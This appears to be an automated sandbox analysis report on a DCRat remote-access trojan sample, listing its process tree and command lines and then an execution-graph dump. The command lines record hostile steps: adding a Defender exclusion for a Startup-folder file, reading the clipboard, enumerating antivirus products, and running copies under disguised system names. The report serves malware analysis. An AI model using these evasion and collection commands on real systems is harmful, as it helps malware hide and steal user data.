                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:24
                                                                    Start time:08:32:09
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:25
                                                                    Start time:08:32:10
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\reg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                    Imagebase:0x7ff603e30000
                                                                    File size:77'312 bytes
                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:08:32:10
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:27
                                                                    Start time:08:32:10
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:08:32:11
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\reg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                    Imagebase:0x7ff603e30000
                                                                    File size:77'312 bytes
                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:29
                                                                    Start time:08:32:11
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:30
                                                                    Start time:08:32:11
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:31
                                                                    Start time:08:32:12
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:wmic path win32_VideoController get name
                                                                    Imagebase:0x7ff740ad0000
                                                                    File size:576'000 bytes
                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:33
                                                                    Start time:08:32:13
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:34
                                                                    Start time:08:32:13
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:35
                                                                    Start time:08:32:13
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:wmic path win32_VideoController get name
                                                                    Imagebase:0x7ff740ad0000
                                                                    File size:576'000 bytes
                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:36
                                                                    Start time:08:32:14
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:37
                                                                    Start time:08:32:14
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:38
                                                                    Start time:08:32:14
                                                                    Start date:05/08/2024
                                                                    Path:C:\Brokercrt\comReviewsession.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Brokercrt\comReviewsession.exe"
                                                                    Imagebase:0xec0000
                                                                    File size:847'360 bytes
                                                                    MD5 hash:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.1871672428.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.1871672428.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 88%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:42
                                                                    Start time:08:32:15
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:43
                                                                    Start time:08:32:15
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:47
                                                                    Start time:08:32:15
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:51
                                                                    Start time:08:32:15
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\SysWOW64\it-IT\dasHost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\SysWOW64\it-IT\dasHost.exe
                                                                    Imagebase:0xef0000
                                                                    File size:847'360 bytes
                                                                    MD5 hash:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.2143786130.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.2143786130.0000000003202000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.2143786130.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 88%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:52
                                                                    Start time:08:32:15
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\SysWOW64\it-IT\dasHost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\SysWOW64\it-IT\dasHost.exe
                                                                    Imagebase:0x110000
                                                                    File size:847'360 bytes
                                                                    MD5 hash:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000034.00000002.2132843674.0000000002412000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000034.00000002.2132843674.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:true

                                                                    Target ID:55
                                                                    Start time:08:32:15
                                                                    Start date:05/08/2024
                                                                    Path:C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
                                                                    Imagebase:0xf40000
                                                                    File size:847'360 bytes
                                                                    MD5 hash:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000037.00000002.2144420087.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000037.00000002.2144420087.0000000003191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 88%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:57
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
                                                                    Imagebase:0x430000
                                                                    File size:847'360 bytes
                                                                    MD5 hash:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000039.00000002.2145328378.0000000002852000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000039.00000002.2145328378.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000039.00000002.2145328378.0000000002848000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 88%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:59
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
                                                                    Imagebase:0xab0000
                                                                    File size:847'360 bytes
                                                                    MD5 hash:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000003B.00000002.2149228048.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000003B.00000002.2149228048.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:true

                                                                    Target ID:61
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:62
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:64
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:65
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:66
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:tasklist /FO LIST
                                                                    Imagebase:0x7ff74ce90000
                                                                    File size:106'496 bytes
                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:67
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:69
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:70
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:71
                                                                    Start time:08:32:16
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:tasklist /FO LIST
                                                                    Imagebase:0x7ff74ce90000
                                                                    File size:106'496 bytes
                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:211
                                                                    Start time:08:32:32
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                    Wow64 process (32bit):
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:
                                                                    Has administrator privileges:
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:221
                                                                    Start time:08:32:33
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                    Wow64 process (32bit):
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:
                                                                    Has administrator privileges:
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:9.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:19.6%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:30
                                                                      execution_graph 15623 7ff76d5cae00 15624 7ff76d5cae2e 15623->15624 15625 7ff76d5cae15 15623->15625 15625->15624 15628 7ff76d5dc90c 15625->15628 15629 7ff76d5dc957 15628->15629 15633 7ff76d5dc91b memcpy_s 15628->15633 15638 7ff76d5d43f4 15629->15638 15630 7ff76d5dc93e RtlAllocateHeap 15632 7ff76d5cae8e 15630->15632 15630->15633 15633->15629 15633->15630 15635 7ff76d5e28a0 15633->15635 15641 7ff76d5e28e0 15635->15641 15647 7ff76d5da5d8 GetLastError 15638->15647 15640 7ff76d5d43fd 15640->15632 15646 7ff76d5df5e8 EnterCriticalSection 15641->15646 15648 7ff76d5da619 FlsSetValue 15647->15648 15653 7ff76d5da5fc 15647->15653 15649 7ff76d5da609 SetLastError 15648->15649 15650 7ff76d5da62b 15648->15650 15649->15640 15664 7ff76d5ddea8 15650->15664 15653->15648 15653->15649 15655 7ff76d5da658 FlsSetValue 15658 7ff76d5da664 FlsSetValue 15655->15658 15659 7ff76d5da676 15655->15659 15656 7ff76d5da648 FlsSetValue 15657 7ff76d5da651 15656->15657 15671 7ff76d5d9c58 15657->15671 15658->15657 15677 7ff76d5da204 15659->15677 15669 7ff76d5ddeb9 memcpy_s 15664->15669 15665 7ff76d5ddf0a 15668 7ff76d5d43f4 memcpy_s 10 API calls 15665->15668 15666 7ff76d5ddeee RtlAllocateHeap 15667 7ff76d5da63a 15666->15667 15666->15669 15667->15655 15667->15656 15668->15667 15669->15665 15669->15666 15670 7ff76d5e28a0 memcpy_s 2 API calls 15669->15670 15670->15669 15672 7ff76d5d9c8c 15671->15672 15673 7ff76d5d9c5d RtlRestoreThreadPreferredUILanguages 15671->15673 15672->15649 15673->15672 15674 7ff76d5d9c78 GetLastError 15673->15674 15675 7ff76d5d9c85 Concurrency::details::SchedulerProxy::DeleteThis 15674->15675 15676 7ff76d5d43f4 memcpy_s 9 API calls 15675->15676 15676->15672 15682 7ff76d5da0dc 15677->15682 15694 7ff76d5df5e8 EnterCriticalSection 15682->15694 19264 7ff76d5ea079 19267 7ff76d5d4788 LeaveCriticalSection 19264->19267 19086 7ff76d5d8c79 19087 7ff76d5d96e8 45 API calls 19086->19087 19088 7ff76d5d8c7e 19087->19088 19089 7ff76d5d8ca5 GetModuleHandleW 19088->19089 19090 7ff76d5d8cef 19088->19090 19089->19090 19091 7ff76d5d8cb2 19089->19091 19098 7ff76d5d8b7c 19090->19098 19091->19090 19112 7ff76d5d8da0 GetModuleHandleExW 19091->19112 19118 7ff76d5df5e8 EnterCriticalSection 19098->19118 19113 7ff76d5d8dd4 GetProcAddress 19112->19113 19114 7ff76d5d8dfd 19112->19114 19115 7ff76d5d8de6 19113->19115 19116 7ff76d5d8e02 FreeLibrary 19114->19116 19117 7ff76d5d8e09 19114->19117 19115->19114 19116->19117 19117->19090 19645 7ff76d5ea10e 19646 7ff76d5ea11d 19645->19646 19647 7ff76d5ea127 19645->19647 19649 7ff76d5df648 LeaveCriticalSection 19646->19649 19272 7ff76d5d9060 19275 7ff76d5d8fe4 19272->19275 19282 7ff76d5df5e8 EnterCriticalSection 19275->19282 19650 7ff76d5da2e0 19651 7ff76d5da2e5 19650->19651 19652 7ff76d5da2fa 19650->19652 19656 7ff76d5da300 19651->19656 19657 7ff76d5da342 19656->19657 19658 7ff76d5da34a 19656->19658 19659 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19657->19659 19660 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19658->19660 19659->19658 19661 7ff76d5da357 19660->19661 19662 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19661->19662 19663 7ff76d5da364 19662->19663 19664 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19663->19664 19665 7ff76d5da371 19664->19665 19666 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19665->19666 19667 7ff76d5da37e 19666->19667 19668 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19667->19668 19669 7ff76d5da38b 19668->19669 19670 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19669->19670 19671 7ff76d5da398 19670->19671 19672 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19671->19672 19673 7ff76d5da3a5 19672->19673 19674 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19673->19674 19675 7ff76d5da3b5 19674->19675 19676 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19675->19676 19677 7ff76d5da3c5 19676->19677 19682 7ff76d5da1a4 19677->19682 19696 7ff76d5df5e8 EnterCriticalSection 19682->19696 15696 7ff76d5cbf5c 15717 7ff76d5cc12c 15696->15717 15699 7ff76d5cc0a8 15840 7ff76d5cc44c IsProcessorFeaturePresent 15699->15840 15700 7ff76d5cbf78 __scrt_acquire_startup_lock 15702 7ff76d5cc0b2 15700->15702 15709 7ff76d5cbf96 __scrt_release_startup_lock 15700->15709 15703 7ff76d5cc44c 7 API calls 15702->15703 15705 7ff76d5cc0bd __CxxCallCatchBlock 15703->15705 15704 7ff76d5cbfbb 15706 7ff76d5cc041 15723 7ff76d5cc594 15706->15723 15708 7ff76d5cc046 15726 7ff76d5c1000 15708->15726 15709->15704 15709->15706 15829 7ff76d5d8e44 15709->15829 15715 7ff76d5cc069 15715->15705 15836 7ff76d5cc2b0 15715->15836 15718 7ff76d5cc134 15717->15718 15719 7ff76d5cc140 __scrt_dllmain_crt_thread_attach 15718->15719 15720 7ff76d5cbf70 15719->15720 15721 7ff76d5cc14d 15719->15721 15720->15699 15720->15700 15721->15720 15847 7ff76d5ccba8 15721->15847 15874 7ff76d5e97e0 15723->15874 15727 7ff76d5c1009 15726->15727 15876 7ff76d5d4794 15727->15876 15729 7ff76d5c352b 15883 7ff76d5c33e0 15729->15883 15735 7ff76d5c3736 16083 7ff76d5c3f70 15735->16083 15736 7ff76d5c356c 15738 7ff76d5c1bf0 49 API calls 15736->15738 15756 7ff76d5c3588 15738->15756 15741 7ff76d5c3785 15744 7ff76d5c25f0 53 API calls 15741->15744 15820 7ff76d5c3538 15744->15820 15745 7ff76d5c3778 15747 7ff76d5c379f 15745->15747 15748 7ff76d5c377d 15745->15748 15746 7ff76d5c365f __vcrt_freefls 15751 7ff76d5c3834 15746->15751 15753 7ff76d5c7e10 14 API calls 15746->15753 15750 7ff76d5c1bf0 49 API calls 15747->15750 16102 7ff76d5cf36c 15748->16102 15752 7ff76d5c37be 15750->15752 15777 7ff76d5c3805 __vcrt_freefls 15751->15777 16106 7ff76d5c3e90 15751->16106 15764 7ff76d5c18f0 115 API calls 15752->15764 15757 7ff76d5c36ae 15753->15757 15755 7ff76d5c3852 15758 7ff76d5c3871 15755->15758 15759 7ff76d5c3865 15755->15759 15945 7ff76d5c7e10 15756->15945 15958 7ff76d5c7f80 15757->15958 15763 7ff76d5c1bf0 49 API calls 15758->15763 16109 7ff76d5c3fe0 15759->16109 15761 7ff76d5c36bd 15765 7ff76d5c380f 15761->15765 15767 7ff76d5c36cf 15761->15767 15763->15777 15766 7ff76d5c37df 15764->15766 15967 7ff76d5c8400 15765->15967 15766->15756 15770 7ff76d5c37ef 15766->15770 15963 7ff76d5c1bf0 15767->15963 15774 7ff76d5c25f0 53 API calls 15770->15774 15773 7ff76d5c389e SetDllDirectoryW 15780 7ff76d5c38c3 15773->15780 15774->15820 16018 7ff76d5c86b0 15777->16018 15778 7ff76d5c36fc 16063 7ff76d5c25f0 15778->16063 15782 7ff76d5c3a50 15780->15782 16023 7ff76d5c6560 15780->16023 15784 7ff76d5c3a5a PostMessageW GetMessageW 15782->15784 15785 7ff76d5c3a7d 15782->15785 